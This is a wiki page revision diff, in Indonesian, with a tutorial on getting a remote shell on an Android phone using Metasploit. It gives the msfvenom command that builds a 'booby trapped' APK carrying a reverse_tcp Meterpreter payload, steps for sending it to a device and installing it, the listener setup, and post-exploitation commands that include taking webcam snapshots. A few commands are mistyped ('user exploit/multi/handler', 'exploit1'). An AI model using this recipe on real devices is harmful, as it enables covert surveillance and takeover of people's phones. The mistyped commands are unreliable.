Difference between revisions of "MSF: Dapatkan remote shell android"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (Created page with "sumber: http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html Metasploit is one of my favorite security tools. What s...") |
Onnowpurbo (talk | contribs) |
||
| (4 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
sumber: http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html | sumber: http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html | ||
| − | + | ==Membuat booby trapped APK file== | |
| − | + | Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan | |
| − | |||
| − | + | sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk | |
| − | + | Masukan IP address Kali Linux & Port-nya. | |
| − | + | ==Di sisi smartphone== | |
| − | Android | + | * Copy / kirim file app.apk di Android device. |
| + | * Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source". | ||
| − | |||
| − | |||
| − | + | ==Di sisi Kali Linux== | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| + | Di CLI, ketik | ||
| + | msfconsole | ||
| + | Jalankan perintah | ||
| + | user exploit/multi/handler | ||
| + | set payload android/meterpreter/reverse_tcp | ||
| + | set lhost 192.168.1.16 (enter your Kali IP address) | ||
| + | set lport 4444 | ||
| + | exploit1 | ||
| + | ==Attack== | ||
| + | sysinfo - informasi tentang device | ||
| + | ps - linux / android ps command | ||
| + | webcam_list - list webcam yang ada | ||
| + | webcam_snap - snapshot webcam | ||
| + | shell - kalau membutuhkan shell (untuk device yang sudah di root) | ||
Latest revision as of 05:54, 1 June 2017
Membuat booby trapped APK file
Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk
Masukan IP address Kali Linux & Port-nya.
Di sisi smartphone
- Copy / kirim file app.apk di Android device.
- Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source".
Di sisi Kali Linux
Di CLI, ketik
msfconsole
Jalankan perintah
user exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.1.16 (enter your Kali IP address) set lport 4444 exploit1
Attack
sysinfo - informasi tentang device ps - linux / android ps command webcam_list - list webcam yang ada webcam_snap - snapshot webcam shell - kalau membutuhkan shell (untuk device yang sudah di root)